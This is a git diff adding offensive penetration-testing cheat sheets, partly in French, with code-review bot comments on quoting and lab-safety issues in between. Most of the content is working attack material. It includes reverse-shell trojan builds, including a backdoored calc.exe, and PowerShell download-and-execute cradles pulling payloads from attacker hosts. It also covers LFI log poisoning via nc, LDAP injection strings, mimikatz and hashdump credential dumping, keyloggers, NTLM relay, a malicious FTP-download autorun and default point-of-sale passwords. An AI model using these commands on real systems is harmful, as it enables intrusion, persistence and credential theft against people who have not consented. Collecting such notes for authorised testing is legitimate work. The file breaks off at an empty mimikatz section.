+http://www.cvedetails.com/cve/CVE-2010-0232/
+http://technet.microsoft.com/en-us/security/bulletin/MS10-015
+http://support.microsoft.com/kb/977165
+http://www.microsoft.com/en-au/download/details.aspx?id=9341
diff --git a/Cheat Sheet/ldap b/Cheat Sheet/ldap
new file mode 100644
index 0000000..48a1ff7
--- /dev/null
+++ b/Cheat Sheet/ldap
@@ -0,0 +1,20 @@
+# ldap
+
+ldapsearch -h host -p 389
+ldapsearch -h host -p 389 -s sub -b '' -x -D '' -v # auth anonyme
+ldapsearch -h host -p 389 -s sub -b 'o=blah,ou=blah' -D 'cn=Directory Manager' -w password
+ldapsearch -h host -p 389 -s sub -b 'o=blah,ou=blah" "(objectclass=*)"
+
+socat -d tcp-l:6636,fork,reuseaddr openssl:192.168.1.100:636,verify=0
+ldapsearch -h 127.0.0.1 -p 6636 ...
+
+ldapsearch -h 192.168.122.55 -x -D 'SECURUS\Administrator' -w Password1 -b "" -s base 'objectclass=*' # limits the scope of the search to the base DN to get the Root DSE
+ldapsearch -H ldap://192.168.122.55 -x -D 'SECURUS\Administrator' -w Password1 -b 'dc=securus,dc=corp,dc=com' # active directory
+
+# windows
+ldifde -a "cn=Directory Manager" s3cr3t -s 172.10.10.11 -f d:\\path\\export.ldif -d ou=demo,ou=blah,dc=thecompany,dc=com
+ldifde -a cn=Administrateur,cn=users,dc=dc1,dc=myowndomain,dc=local Password1 -s 192.168.111.189 -f export.ldif
+
+# ldap injection
+vuln=*)(sn=
+vuln=*)!(sn=*
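Review bot: The fourth `ldapsearch -h host -p 389 -s sub -b 'o=blah,ou=blah" "(objectclass=*)"` line has mismatched quotes (opens with `'`, closes with `"`), so the shell waits for more input instead of running it; it should read `ldapsearch -h host -p 389 -s sub -b 'o=blah,ou=blah' '(objectclass=*)'`. The two Active Directory examples pass `-w Password1` on the command line, which leaves the password in shell history and in the process list; prefer `-W` (prompt) or `-y <password-file>`, and the same applies to the `ldifde -a ... s3cr3t` and `... Password1` lines. The `socat ... openssl:192.168.1.100:636,verify=0` relay disables certificate verification, which is fine for a lab but worth a `# lab only` comment.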
diff --git a/Cheat Sheet/lfi b/Cheat Sheet/lfi
new file mode 100644
index 0000000..df3fa81
--- /dev/null
+++ b/Cheat Sheet/lfi
@@ -0,0 +1,67 @@
+# lfi
+
+# http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/
+/../../etc/passwd%00
+/../../var/log/httpd/access_log
+/proc/self/environ + User-Agent (no need to url-encode)
+
+# use filter to read a .php file (prevent it to be interpreted)
+index.php?page=php://filter/convert.base64-encode/resource=/path/to/config.php
+
+tester avec data://
+view-source:data://text/plain;base64,Ym9uam91cgo=
+
+# use compression
+php://filter/zlib.deflate/convert.base64-encode/resource=bigfile.txt
+
+# use iconv to convert a file to a php image
+php://filter/convert.iconv.IBM1154%2fUTF-32BE/resource=/flag http://gynvael.coldwind.pl/?lang=en&id=671
+
+# does a folder exist
+index.php?page=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
+
+# PHP 5.3.4
+NULL byte in paths fixed
+
+# windows
+* use Alternate Data Streams (https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/)
+../../test.txt:data.aspx
+echo secret > test.txt:data.aspx
+more < test.txt:data.aspx
+type test.txt:data.aspx will print the "The filename, ... syntax is incorrect" error
+
+::$DATA to access the content of the file (and not an ADS)
+show source code bypass: http://www.alternate-data-streams.com/default.asp::$DATA
+
+* use multibyte encodings
+null byte: %c0%80
+fwd slash: ../%c0%af (because %80 + %2f == %af)
+old school 2000: http ://www.myserver.com/scripts/..%c0%af../winnt/system32/cmd.exe?c+dir+c:\
+many other ways to encode the forward-slash and backslah in unicode:
+%c0%af %c1%9c %c1%pc %c0%qf %c1%8s %c1%1c %c1%af %e0%80%af
+source: http://www.sans.org/reading-room/whitepapers/threats/unicode-vulnerability-why-458
+
+# logs
+/proc/self/fd/10
+access_log
+or other logs e.g. via ssh client banner:
+echo ' system($_GET["cmd"]);exit; ?>' | nc 10.0.0.1 22
+then curl 10.0.0.1/test.php?page=/var/log/auth.log&cmd=id
+
+# if you can upload files or images
+insert php code in file
+https://github.com/m101/lfipwn
+if you can use the zip:// handler, upload a png with a zip in the palette (polyglot) see plaid-ctf-2016 pixelshop
+
+# appsec usa 2013 schemes by platform
+* libxml2
+file, http, ftp
+* PHP
+file, http, ftp, php, compress.zlib, compress.bzip2, data, glob, phar
+* Java
+http, https, ftp, file, jar, netdoc, mailto, gopher (removed circa Sept 2012)
+file://proc/self//cwd/../config (evite de trouver le installdir de l'app)
+* .NET
+file, http, https, ftp
+
+also see ./ssrf
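Review bot: The `%00` null-byte examples (`/../../etc/passwd%00` and the `dossierexistant/../../../../../etc/passwd%00` folder probe) sit well above the `# PHP 5.3.4 / NULL byte in paths fixed` note they depend on, so a reader can miss that the truncation only applies to PHP < 5.3.4; repeat the caveat next to the first example, e.g. `# %00 truncation only on PHP < 5.3.4`. The `http ://www.myserver.com/scripts/...` reference has a stray space before `://`, and `backslah` should read `backslash`. The `%c1%pc %c0%qf %c1%8s` sequences are not valid hex escapes; if they are reproduced from the cited SANS paper on purpose, a comment saying so would stop the next editor "fixing" them.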
diff --git a/Cheat Sheet/lftp b/Cheat Sheet/lftp
new file mode 100644
index 0000000..d03b367
--- /dev/null
+++ b/Cheat Sheet/lftp
@@ -0,0 +1,12 @@
+# lftp
+
+# no SSL cert verification and setting the port range for active mode if passive mode does work then lftp falls back to active mode
+$ lftp -d 200.10.10.10
+lftp 200.10.10.10:~> user foo
+Password:
+lftp foo@200.10.10.10:~> set ftp:port-range 60000:61000
+lftp foo@200.10.10.10:~> set ssl:verify-certificate no
+lftp foo@200.10.10.10:~> ls
+
+# active mode
+lftp -e 'set ftp:passive-mode off; set ftp:auto-passive-mode no;'
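Review bot: The comment above the session (`... if passive mode does work then lftp falls back to active mode`) says the opposite of what the steps do; it presumably means `does not work`. `set ssl:verify-certificate no` turns off certificate checking for the whole session, so it deserves a `# disables TLS verification - lab/testing only` note rather than sitting unmarked next to the port-range setting. The `lftp -e 'set ftp:passive-mode off; set ftp:auto-passive-mode no;'` example under `# active mode` would be clearer with the host appended, e.g. `lftp -e '...' 200.10.10.10`, to match the first example.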
diff --git a/Cheat Sheet/liferay b/Cheat Sheet/liferay
new file mode 100644
index 0000000..5558b2c
--- /dev/null
+++ b/Cheat Sheet/liferay
@@ -0,0 +1,11 @@
+# liferay
+
+http://www.insinuator.net/2011/12/liferay-portlet-shell/
+
+# admin / deballer la guerre
+default account: test@liferay.com / test
+
+# hack liferay calendar using https://issues.liferay.com/browse/LPS-28310
+payload is something like
+groupId=10138&fileName=te&serviceClassName=com.liferay.portlet.calendar.service.CalEventServiceUtil&serviceMethodName=exportGroupEvents&serviceParameters=%5B%22groupId%22%2C%22fileName%22%5D&doAsUserId=
+you need to create an event with some java code in the title and export it somewhere you can access it
diff --git a/Cheat Sheet/linux b/Cheat Sheet/linux
new file mode 100644
index 0000000..6d8a4ac
--- /dev/null
+++ b/Cheat Sheet/linux
@@ -0,0 +1,65 @@
+# linux
+
+https://0xax.gitbooks.io/linux-insides/content/index.html
+
+# capabilities
+lsattr /bin/ping
+-------------e-- /bin/ping
+getcap /bin/ping
+/bin/ping = cap_net_admin,cap_net_raw+ep
+
+# disable ASLR
+echo 0 > /proc/sys/kernel/randomize_va_space
+
+# kaslr bypass
+kernel_text=$((0x80000000+0x`cat /proc/iomem|grep code|cut -d- -f1|tr -d ' '`))
+
+# coreutils
+rpm -ql coreutils | grep man1 | sed -e 's,^.\+/,,' -e 's,\.1\.gz$,,'
+
+# iproute2
+ip route change default via 192.168.99.113 dev eth0
+
+# monitoring / performance observability tools
+http://www.brendangregg.com/Perf/linux_observability_tools.png
+http://xmodulo.com/useful-command-line-network-monitors-linux.html
+http://xmodulo.com/visualize-memory-usage-linux.html (smem)
+glances
+nethogs
+iptraf
+iftop
+nmon
+bmon
+pktstat
+tcptrack
+https://github.com/caesar0301/awesome-pcaptools
+
+# using the Lime LKM to dump memory
+http://blog.opensecurityresearch.com/2014/05/acquiring-linux-memory-from-server-far.html
+
+# sysctl
+recharge la conf avec sysctl -p
+
+# get rid of ipv6
+net.ipv6.conf.all.disable_ipv6 = 1
+net.ipv6.conf.default.disable_ipv6 = 1
+
+# mitm
+net.ipv4.ip_forward = 1
+net.ipv4.conf.all.send_redirects = 0
+net.ipv4.conf.default.send_redirects = 0
+net.ipv4.conf.all.accept_redirects = 0
+net.ipv4.conf.default.accept_redirects = 0
+
+# systemd
+https://n0where.net/understanding-systemd/
+
+# kernel modules
+* modinfo
+$ sudo modinfo iwl3945 | grep srcversion
+srcversion: FDE2E62843DE3ED112A50C3
+
+# rootkits
+https://github.com/mncoppola/suterusu
+http://blackhatlibrary.net/Azazel
+https://github.com/f0rb1dd3n/Reptile
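Review bot: `echo 0 > /proc/sys/kernel/randomize_va_space` under `# disable ASLR` turns randomization off for every process on the host until the next reboot, which is broader than a single debugging session needs. When only one binary is being studied, `setarch x86_64 -R ./binary` (substituting the current architecture) removes randomization for that process alone and leaves the system-wide setting intact; a comment such as `# system-wide until reboot; prefer setarch -R for a single process` would make the trade-off visible. The `# mitm` sysctl block further down (`net.ipv4.ip_forward = 1`, redirects off) is equally host-wide and deserves the same reminder to revert it once the test is over.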
diff --git a/Cheat Sheet/load_balancing b/Cheat Sheet/load_balancing
new file mode 100644
index 0000000..b1e6b5e
--- /dev/null
+++ b/Cheat Sheet/load_balancing
@@ -0,0 +1,8 @@
+# load balancer
+
+Client-Date: pour detecter plusieurs srv derriere un Load Balancer
+
+hping -S -p 80 -c 5 80.100.101.102; hping -S -p 80 -c 5 80.70.60.50
+Si les ID se suivent, les 2 plages correspondent aux memes machines
+
+
diff --git a/Cheat Sheet/malware b/Cheat Sheet/malware
new file mode 100644
index 0000000..60385b3
--- /dev/null
+++ b/Cheat Sheet/malware
@@ -0,0 +1,96 @@
+# malware / virus
+
+# malware techniques
+https://github.com/secrary/InjectProc # process injection
+https://securedorg.github.io/RE101/
+
+# extract macros from office documents
+http://blog.didierstevens.com/2014/12/23/oledump-extracting-embedded-exe-from-doc/
+
+# excel malicious macro
+http://carnal0wnage.attackresearch.com/2015/01/enigma0x3s-generate-macro-powershell.html
+
+# quick scan
+https://github.com/Neo23x0/Loki.git
+
+# online testing
+https://malwr.com/
+https://anubis.iseclab.org/
+https://www.metascan-online.com/
+reverse.it/hybrid-analysis.com
+www.threatexpert.com
+www.virustotal.com
+vscan.novirusthanks.org # with check box that says "Do not distribute the sample"
+wepawet.iseclab.org
+
+# dynamic analysis
+http://www.darknet.org.uk/2016/05/captipper-explore-malicious-http-traffic/ (observe HTTP traffic from pcap)
+
+# analysis
+http://haxf4rall.com/2017/07/26/flare-vm-a-fully-customizable-windows-based-security-distribution-for-malware-analysis-incident-response-penetration-testing/ # flare vm
+https://github.com/GoSecure/malboxes
+http://www.malware-analyzer.com/malware-analysis-tools/
+http://cuckoosandbox.org/
+
+# see if anyone else has seen the file
+fileadvisor.bit9.com
+
+# silly autoruns
+HKLM\software\wow6432node\microsoft\windows\currentversion\run
+blah REG_SZ c:\windows\SysWow64\cmd.exe /c net1 stop sharedaccess&echo open 6.6.6.6 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get server.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&server.exe&del ...
+
+any entry with a value that starts with c:\windows\syswow64\cmd sysinternal\autoruns will not be shown by sysinternals/autoruns
+
+# virus (history, interviews, online ezines ...)
+http://spth.virii.lu/main.htm
+
+# volatility
+http://blog.hackeracademy.com/wp-content/uploads/2012/12/THA-Deep-Dive-Analyzing-Malware-in-Memory.pdf
+
+# blaster
+Blaster/Lovsan : vers exploitant une vulnerabilité dans l'interface DCOM du système d'exploitation Windows (XP et 2000).
+16 juillet 2003: vuln découverte par le groupe polonais Last Stage of Delirium et MS publie le correctif MS03-026.
+11 aout 2003: premiere detection du vers, puis apparition des variantes B,C,...
+
+DCOM est utilisé pour la communication inter-processus, cela permet à un
+programme actif sur une machine locale d'exécuter du code sur une machine
+distante. Ce protocole est une variante du protocole RPC de l'Open Software
+Foundation (OSF) comportant des extensions Microsoft spécifiques.
+
+La faille est de type débordement de tampon, son exploitation permet, via une
+requête formatée convenablement, d'exécuter du code arbitraire sur une machine
+vulnérable.
+
+Mécanisme d'infection
+1. Generation de 20 adresses IP aléatoires qui permet une diffusion optimale
+2. connect(T:135)
+3. Pour les connexions établies, injection d'une partie du code malveillant (exploit ou charge)
+4. Comme l'adresse de retour (et donc le code de l'exploit) est different entre win2k et winXP, 1 fois sur 4, c'est la charge pour win2k qui est envoyé, sinon c'est pour winXP
+5. connect(T:4444)
+6. tftp -l GET msblash.exe
+7. Execution du ver pour infecter la victime (start msblast.exe)
+8. Creation du mutex "Billy" pour eviter la surinfection et d'une clef de registre pour rendre le ver persistent au reboot
+9. à partir du 16 aout, DoS windowsupdate.com : envoi d'un paquet Syn toute les 20ms avec adresse source aleatoire (spoofée)
+
+Remarques diverses
+ - Erreur du programmeur du ver: possible de faire des mises à jour windows avec d'autres URL
+windowsupdate.microsoft.com (windows update du menu démarrer)
+www.microsoft.com/isapi/redir.dll?prd=Win2000&ar=WinUpdate
+ - choix de la date préméditée (vacances (machines éteintes) puis retour de vacances (infection) et DoS (retarder maj) = augmenter impact)
+ - correctif MS03-049 mi-novembre pour une vuln dans Workstation Service (2000 et XP): perte de la confiance des utilisateurs? En tout cas, importance d'une reactivité serieuse dans l'application des correctifs pour les systèmes perclus de failles!
+
+# famous worms/viruses
+* yammer
+Js.Yamanner@m Yahoo! Mail worm. It appeared on June 11, 2006 and was the first webmail interface worm
+
+* Nduja
+Another proof-of-concept webmail worm is Nduja, a cross-domain worm for four Italian webmail services. Find more details on Rosario Valotta's paper. Both webmail worms have the goal to harvest email addresses, something a criminal hacker could make money with.
+
+* MySpace phishing 34k user/passwords
+In December 2006, 34000 actual user names and passwords were stolen in a MySpace phishing attack.
+The idea of the attack was to create a profile page named ¿login_home_index_html¿, so the URL looked very convincing.
+Specially-crafted HTML and CSS was used to hide the genuine MySpace content from the page and instead display its own login form.
+
+* MySpace Samy
+This worm automatically sent a friend request to Samy (the attacker) simply by visiting his profile.
+Within several hours he had over 1 million friend requests, but it creates too much traffic on MySpace, so that the site goes offline.
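Review bot: The `# online testing` list gives no indication that submitting a sample to these services shares it with third parties; only `vscan.novirusthanks.org` is annotated with a do-not-distribute option. A one-line caveat at the top of the section, such as `# public multiscanners share submissions with vendors and expose the hash publicly; never upload client-confidential or targeted samples, use a local sandbox (cuckoo / flare vm below) instead`, would keep an incident responder from tipping off an adversary who watches for their own sample surfacing. Several of the listed services (malwr.com, anubis, wepawet, threatexpert) appear to have been offline for years, so marking them as historical would also help.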
diff --git a/Cheat Sheet/maven b/Cheat Sheet/maven
new file mode 100644
index 0000000..5019866
--- /dev/null
+++ b/Cheat Sheet/maven
@@ -0,0 +1,4 @@
+# maven
+
+# skip unit tests
+mvn -Dmaven.test.skip=true clean install
diff --git a/Cheat Sheet/mcafee b/Cheat Sheet/mcafee
new file mode 100644
index 0000000..6236e15
--- /dev/null
+++ b/Cheat Sheet/mcafee
@@ -0,0 +1,10 @@
+# mcafee
+
+# privesc to DA with SiteList.xml
+https://www.reddit.com/r/netsec/comments/43mni7/mcafee_privileged_sitelistxml_leads_to_active/
+https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
+https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf from the reddit comments
+http://warchest.fusionx.com/mcafee-sitelist-xml-domain-credentials-disclosure/
+
+# ePO server / epolicy
+https://funoverip.net/2014/04/mcafee-epolicy-0wner-0-1-release/
diff --git a/Cheat Sheet/md5 b/Cheat Sheet/md5
new file mode 100644
index 0000000..af1d689
--- /dev/null
+++ b/Cheat Sheet/md5
@@ -0,0 +1,24 @@
+# md5
+
+# 1 block collisions
+
+* md5
+http://marc-stevens.nl/research/md5-1block-collision/
+input1 = '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2'.decode('hex')
+input2 = '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2'.decode('hex')
+or
+input1 = '0e306561559aa787d00bc6f70bbdfe3404cf03659e704f8534c00ffb659c4c8740cc942feb2da115a3f4155cbb8607497386656d7d1f34a42059d78f5a8dd1ef'.decode('hex')
+input2 = '0e306561559aa787d00bc6f70bbdfe3404cf03659e744f8534c00ffb659c4c8740cc942feb2da115a3f415dcbb8607497386656d7d1f34a42059d78f5a8dd1ef'.decode('hex')
+
+print 'Are strings equal?',(input1 == input2)
+print 'input1 md5:',md5(input1).hexdigest()
+print 'input2 md5:',md5(input2).hexdigest()
+
+* sha1
+input1 = array('I', [0x6165300e,0x87a79a55,0xf7c60bd0,0x34febd0b,0x6503cf04,0x854f709e,0xfb0fc034,0x874c9c65,0x2f94cc40,0x15a12deb,0x5c15f4a3,0x490786bb,0x6d658673,0xa4341f7d,0x8fd75920,0xefd18d5a])
+input2 = array('I', [x^y for x,y in zip(input1,[0, 0, 0, 0, 0, 1<<10, 0, 0, 0, 0, 1<<31, 0, 0, 0, 0, 0])])
+
+print 'Are strings equal?',(input1 == input2)
+print 'input1 sha1:',sha1(input1).hexdigest()
+print 'input2 sha1:',sha1(input2).hexdigest()
+
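Review bot: The snippets under `# 1 block collisions` use names that are never imported, and they are Python 2 syntax (`'...'.decode('hex')`, `print 'x', y`), which nothing in the file mentions. Adding `from hashlib import md5, sha1` and `from array import array` at the top with a `# python2` marker makes them runnable as pasted; the Python 3 equivalents are `bytes.fromhex('...')` and `print(...)`. The `* sha1` heading is also misleading: the `array('I', [...])` words are the second MD5 pair above re-encoded as little-endian 32-bit words (the two XOR masks `1<<10` and `1<<31` reproduce its two differing bytes), so the two SHA-1 digests will differ, and a heading like `* same MD5 pair hashed with sha1 (no collision)` would state what the demo shows. The item size of `array('I')` is platform-dependent as well; `struct.pack('<16I', *words)` would pin it to 4 bytes.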
diff --git a/Cheat Sheet/medusa b/Cheat Sheet/medusa
new file mode 100644
index 0000000..f7b24ba
--- /dev/null
+++ b/Cheat Sheet/medusa
@@ -0,0 +1,6 @@
+# medusa
+
+# bug auth basic tomcat manager
+./medusa -v 4 -M http -U ~/logins.wl -P ~/passwords.wl -m DIR:/manager/html -h 127.0.0.1 -n 8080
+
+medusa marche pas quand la reponse 401 est fragmentée en 2 paquets TCP. Faut augmenter le delay2 mais du coup on lit toute la reponse et on perd en perf.
diff --git a/Cheat Sheet/metasploit b/Cheat Sheet/metasploit
new file mode 100644
index 0000000..30bf2c8
--- /dev/null
+++ b/Cheat Sheet/metasploit
@@ -0,0 +1,208 @@
+# metasploit
+
+https://metasploit.github.io/
+
+# basic trojan
+./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.1 LPORT=4444 X > meter.exe
+./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.1 LPORT=4444 R | ./msfencode -b '' -t exe -o meterpreter.exe
+./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.1 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5 // x86 only?
+./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.1 R | python ~/tools/exploit/pwntools/scramble/scramble - | ./msfencode -t exe -e generic/none -o blah.exe // to try
+http://carnal0wnage.attackresearch.com/node/409
+
+# quick wins
+./msfconsole -x 'use multi/handler; set payload cmd/unix/reverse_bash; set lport 1234; set lhost 127.0.0.1; set ExitOnSession false; exploit -j -z' # handle multiple reverse shells
+./msfconsole -x 'use multi/handler; set payload windows/meterpreter/reverse_tcp; set lport 1234; set lhost 192.168.122.1; exploit -j -z'
+./msfvenom -e x86/alpha_mixed -f raw -p windows/meterpreter/reverse_tcp BufferRegister=EAX LPORT=1234 LHOST=
+
+./msfconsole -x 'use exploit/multi/script/web_delivery; set URIPATH /foo; set lport 1234; set lhost 192.168.122.1; set target 2; exploit -j -z'
+c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe #if c:\windows\system32\powershell.exe doesnt exist
+powershell.exe -nop -c IEX ((new-object net.webclient).downloadstring('http://192.168.122.1:8080/foo')) #simple
+powershell.exe -nop -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX ((new-object net.webclient).downloadstring('https://192.168.122.1:8080/foo')) # simple w/ ssl to avoid detection
+
+powershell.exe -nop -w hidden -c $O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $O.downloadstring('http://192.168.122.1:8080/foo'); #msf
+powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$s=new-object net.webclient;$s.proxy=[Net.WebRequest]::GetSystemWebProxy();$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $s.downloadstring('https://192.168.122.1:8080/foo'); # msf w/ ssl
+
+msfcli exploit/windows/smb/psexec RHOST= SMBUser= SMBPass= SMBDomain= PAYLOAD=windows/meterpreter/bind_tcp E
+msfcli exploit/windows/smb/ms08_067_netapi RHOST= PAYLOAD=windows/meterpreter/bind_tcp E
+msfcli exploit/windows/antivirus/ams_hndlrsvc RHOST= CMD='telnet x.x.x.x 445' E
+msfcli auxiliary/scanner/smb/smb_lookupsid RHOSTS=file:dcs.txt E
+msfcli modules/auxiliary/scanner/snmp/snmp_login RHOST=x.x.x.x E
+msfcli auxiliary/server/capture/smb JOHNPWFILE=/tmp/capture-smb.pw VERBOSE=true SRVHOST=127.0.0.1 SRVPORT=4445 E (and as root: socat tcp-l:445,fork,reuseaddr tcp:127.0.0.1:4445)
+
+auxiliary/scanner/misc/java_rmi_server
+auxiliary/scanner/lotus/lotus_domino_hashes
+auxiliary/scanner/smb/smb_enumusers
+auxiliary/scanner/smb/smb_lookupsid
+auxiliary/scanner/oracle/sid_enum
+
+# client side
+Office OLE multiple DLL https://vimeo.com/138840584
+
+# main commands
+show options
+show advanced
+set (includes setg output)
+back
+set proxies http:127.0.0.1:8082 // or socks4:127.0.0.1:8082
+
+getuid
+sysinfo
+getpid
+ps
+services
+
+# dev
+rexploit # reloads module
+
+# elevation
+run post/ // to list all available
+run migrate or smart_migrate
+run vnc
+run screen_unlock
+
+keyscan_start
+keyscan_dump
+keyscan_stop
+
+use priv
+getsystem -t 1 ... http://carnal0wnage.attackresearch.com/node/404
+getuid
+rev2self // revenir sous le user precedent
+
+stal_token
+shell // uses impersonated token by default (-t option of execute)
+drop_token
+
+# recup infos
+scraper
+winenum
+wmic
+
+# enable telnet
+gettelnet -e
+
+# port scanner
+meterpreter > run autoroute -s 10.p.c.i/24
+^Z
+use auxiliary/scanner/portscan/tcp
+set THREADS 10
+set CONCURRENCY 10
+
+or try out msfmap in tools
+
+# port fwd
+portfwd add -l 1234 -p 3389 -r 10.0.0.2
+
+# post-exploit
+* msf/meterpreter
+hashdump
+use post/windows/gather/cachedump
+set SESSION 1
+run
+
+lancer les outils suivants dans un shell SYSTEM, donc soit avec:
+ - execute -m -i -f tool.exe [-a des options ...] (ressayer plusieurs fois si rien ne s'affiche)
+execute -m -i -f /home/seb/tools/exploit/wce64.exe
+execute -m -i -f /home/seb/tools/exploit/wce64.exe -a -w
+execute -m -i -f /home/seb/tools/exploit/gsecdump.exe -a -a
+
+meterpreter > download c:\\windows\\system32\\calc.exe
+meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
+
+sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.6.6.6:8080/'))"
+
+ - sinon depuis un cmd.exe
+wce.exe
+wce.exe -w
+
+gsecdump -a
+
+mimikatz.exe
+privilege::debug
+sekurlsa::logonPasswords
+sekurlsa::ssp
+samdump::hashes
+
+# auto with rc scripts
+msf.rc:
+set ConsoleLogging true
+set LogLevel 5
+set SessionLogging true
+set TimestampOutput true
+set PROMPT %T S:%S J:%J
+use multi/handler
+set PAYLOAD windows/meterpreter/reverse_tcp
+set LHOST 192.168.122.1
+set LPORT 4444
+set ExitOnSession false
+set AutoRunScript multiscript -rc /path/to/meterpreter.rc # see https://github.com/rapid7/metasploit-framework/tree/master/scripts/meterpreter
+exploit -j -z
+
+meterpreter.rc:
+get_env
+multi_console_command -cl "getuid","sysinfo","webcam_snap","screenshot"
+migrate -f
+checkvm
+
+might need to migrate to proper process to get screenshot or keylock-sniff-pw etc.
+
+./msfconsole -r msf.rc
+
+shim2.exe <...>
+
+crackmapexec -d DOM -u foo -p bar --no-output -x '\\6.6.6.6\l\shim2.bat' 1.2.3.4
+
+# generate standalone exe from msfconsole
+generate -t exe -f blah.exe
+
+# kiwi
+load kiwi (load mimikatz for old version)
+
+# misc notes
+whosthere ne marche pas sur 2008
+whosthere-alt a deja marche sur 2008 et 2003 (mais produit la meme sortie que wce.exe)
+
+wce -e crash au bout d'un moment, mieux vaut utiliser wce -r
+
+* incognito
+use incognito
+list_tokens -u
+impersonate ...
+getuid
+execute -t -i -c -H -f cmd.exe
+whoami
+execute -t -f c:\\windows\\temp\\shim2.exe -a PYIII...
+
+* CMD
+./msfpayload java/meterpreter/bind_tcp LPORT=5556 X > lin.jar
+wget -O /tmp/lin.jar http:///lin.jar
+java -jar /tmp/lin.jar
+
+# golden ticket in meterpreter
+http://blog.strategiccyber.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
+
+# ms14-068 in metasploit
+https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
+
+# phish
+* keylogger
+run post/windows/capture/keylog_recorder # capture winlogon creds
+run post/windows/capture/lockout_keylogger # fake lockscreen
+
+https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/
+
+# harvesting files
+http://carnal0wnage.attackresearch.com/2015/02/my-golddigger-script.html
+
+# http ntlm auth attempt to smb relay
+use auxiliary/server/http_ntlmrelay
+
+set URIPATH /
+set SRVPORT 80
+set RHOST 10.0.0.101 // BACKUP DC
+set RPORT 445
+set RTYPE SMB_PWN
+set RURIPATH \\\\10.6.6.6\share\shim2.exe // payload hard-coded
+
+# api
+https://osandamalith.wordpress.com/2015/02/19/accessing-the-windows-api-directly/
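Review bot: The `msf.rc` block under `# auto with rc scripts` enables `ConsoleLogging`, `SessionLogging` and `LogLevel 5`, yet nothing notes that those logs will capture everything the sessions print, including the `hashdump`, `cachedump` and mimikatz output the post-exploit section collects. A comment next to `set SessionLogging true` such as `# session logs (~/.msf4/logs by default) will contain dumped credentials: protect them and wipe at engagement end` would keep that material from outliving the engagement on the operator's machine. The same applies to the `JOHNPWFILE=/tmp/capture-smb.pw` capture file in the quick-wins section, which lands in the shared `/tmp` directory and is readable by other local users under a default umask.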
diff --git a/Cheat Sheet/methodo-webapp b/Cheat Sheet/methodo-webapp
new file mode 100644
index 0000000..669ac8e
--- /dev/null
+++ b/Cheat Sheet/methodo-webapp
@@ -0,0 +1,42 @@
+# methodology for webapp testing
+
+# Map the Application's Content
+* Explore visible content
+browse the entire app, visit every link and URL, submit every form, proceed through all multi-step functions to completion.
+review the site map and identify any content or functionality that I have not walked through using my browser
+establish where each item was discovered (for exmample, check the Linked From details in Burp Spider)
+
+* Internet search
+archives (wayback)
+google site: and link:
+search on any names and email addresses discovered within the application's content
+perform news and groups searches regarding the target application and its supporting infrastructure
+
+* Discover hidden content
+common fil and directory names and common file extensions
+understand the nameing conventions (AddDocument.jsp and ViewDocument.jsp => EditDocument.jsp)
+review all client-side code to identify any clues about hidden server-side content (HTML comments, disabled forms ...)
+
+* Discover default content
+nikto etc.
+
+* Enumerate identified-specified functions
+/admin.jsp?action=editUser or /main.php?func=A21
+
+* Test for debug parameters
+debug,test,hide,source=true,yes,on,1
+for POST requests, supply in both query string and body
+
+# Analyze the application
+* Identify functionality
+identify the core security mechanisms employed by the application and the ways they work
+understand the key mechanisms that handle authentication, session management, access control, and the functions that support them, such as user registration and account recovery
+
+* Identify data entry points
+identify all of the different entry points that exist
+examine any customized data transmission or encoding mechanisms
+identify any out-of-band channels (eg. webmail that processes messages received via SMTP)
+
+* Identify the Technologies Used
+forms, scripts, cookies, Java applets, ActiveX controls, Flash objects
+
diff --git a/Cheat Sheet/micros b/Cheat Sheet/micros
new file mode 100644
index 0000000..8927d83
--- /dev/null
+++ b/Cheat Sheet/micros
@@ -0,0 +1,13 @@
+# micros
+
+vendor default password is 'micros'
+
+m9700 / Micros9700
+9700Cfg / undisclosed
+csremote/EBUTO
+sa / mymicros
+administrator / micros
+
+other common logins & passwords:
+pos/pos
+pos/pos0000
diff --git a/Cheat Sheet/microsoft b/Cheat Sheet/microsoft
new file mode 100644
index 0000000..570aa30
--- /dev/null
+++ b/Cheat Sheet/microsoft
@@ -0,0 +1,8 @@
+# microsoft
+
+# download legal iso
+http://superuser.com/questions/78761/where-can-i-download-windows-7-legally-from-microsoft
+http://forums.whirlpool.net.au/archive/1755258
+
+# office365 auth bypass
+http://www.economyofmechanism.com/office365-authbypass.html
diff --git a/Cheat Sheet/mimikatz b/Cheat Sheet/mimikatz
new file mode 100644
index 0000000..b6b2474
--- /dev/null
+++ b/Cheat Sheet/mimikatz
@@ -0,0 +1,120 @@
+# mimikatz
+
